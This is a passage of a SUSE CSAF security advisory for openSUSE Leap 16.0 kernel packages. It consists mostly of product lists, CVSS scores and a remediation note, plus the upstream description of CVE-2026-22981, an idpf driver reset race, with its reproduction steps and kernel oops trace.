"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22981",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22981"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: detach and close netdevs while handling a reset\n\nProtect the reset path from callbacks by setting the netdevs to detached\nstate and close any netdevs in UP state until the reset handling has\ncompleted. During a reset, the driver will de-allocate resources for the\nvport, and there is no guarantee that those will recover, which is why the\nexisting vport_ctrl_lock does not provide sufficient protection.\n\nidpf_detach_and_close() is called right before reset handling. If the\nreset handling succeeds, the netdevs state is recovered via call to\nidpf_attach_and_open(). If the reset handling fails the netdevs remain\ndown. The detach/down calls are protected with RTNL lock to avoid racing\nwith callbacks. On the recovery side the attach can be done without\nholding the RTNL lock as there are no callbacks expected at that point,\ndue to detach/close always being done first in that flow.\n\nThe previous logic restoring the netdevs state based on the\nIDPF_VPORT_UP_REQUESTED flag in the init task is not needed anymore, hence\nthe removal of idpf_set_vport_state(). The IDPF_VPORT_UP_REQUESTED is\nstill being used to restore the state of the netdevs following the reset,\nbut has no use outside of the reset handling flow.\n\nidpf_init_hard_reset() is converted to void, since it was used as such and\nthere is no error handling being done based on its return value.\n\nBefore this change, invoking hard and soft resets simultaneously will\ncause the driver to lose the vport state:\nip -br a\n\u003cinf\u003e\tUP\necho 1 \u003e /sys/class/net/ens801f0/device/reset\u0026 \\\nethtool -L ens801f0 combined 8\nip -br a\n\u003cinf\u003e\tDOWN\nip link set \u003cinf\u003e up\nip -br a\n\u003cinf\u003e\tDOWN\n\nAlso in case of a failure in the reset path, the netdev is left\nexposed to external callbacks, while vport resources are not\ninitialized, leading to a crash on subsequent ifup/down:\n[408471.398966] idpf 0000:83:00.0: HW reset detected\n[408471.411744] idpf 0000:83:00.0: Device HW Reset initiated\n[408472.277901] idpf 0000:83:00.0: The driver was unable to contact the device\u0027s firmware. Check that the FW is running. Driver state= 0x2\n[408508.125551] BUG: kernel NULL pointer dereference, address: 0000000000000078\n[408508.126112] #PF: supervisor read access in kernel mode\n[408508.126687] #PF: error_code(0x0000) - not-present page\n[408508.127256] PGD 2aae2f067 P4D 0\n[408508.127824] Oops: Oops: 0000 [#1] SMP NOPTI\n...\n[408508.130871] RIP: 0010:idpf_stop+0x39/0x70 [idpf]\n...\n[408508.139193] Call Trace:\n[408508.139637] \u003cTASK\u003e\n[408508.140077] __dev_close_many+0xbb/0x260\n[408508.140533] __dev_change_flags+0x1cf/0x280\n[408508.140987] netif_change_flags+0x26/0x70\n[408508.141434] dev_change_flags+0x3d/0xb0\n[408508.141878] devinet_ioctl+0x460/0x890\n[408508.142321] inet_ioctl+0x18e/0x1d0\n[408508.142762] ? _copy_to_user+0x22/0x70\n[408508.143207] sock_do_ioctl+0x3d/0xe0\n[408508.143652] sock_ioctl+0x10e/0x330\n[408508.144091] ? find_held_lock+0x2b/0x80\n[408508.144537] __x64_sys_ioctl+0x96/0xe0\n[408508.144979] do_syscall_64+0x79/0x3d0\n[408508.145415] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[408508.145860] RIP: 0033:0x7f3e0bb4caff",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22981",
"url": "https://www.suse.com/security/cve/CVE-2026-22981"
},
{
"category": "external",
"summary": "SUSE Bug 1257225 for CVE-2026-22981",
"url": "https://bugzilla.suse.com/1257225"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
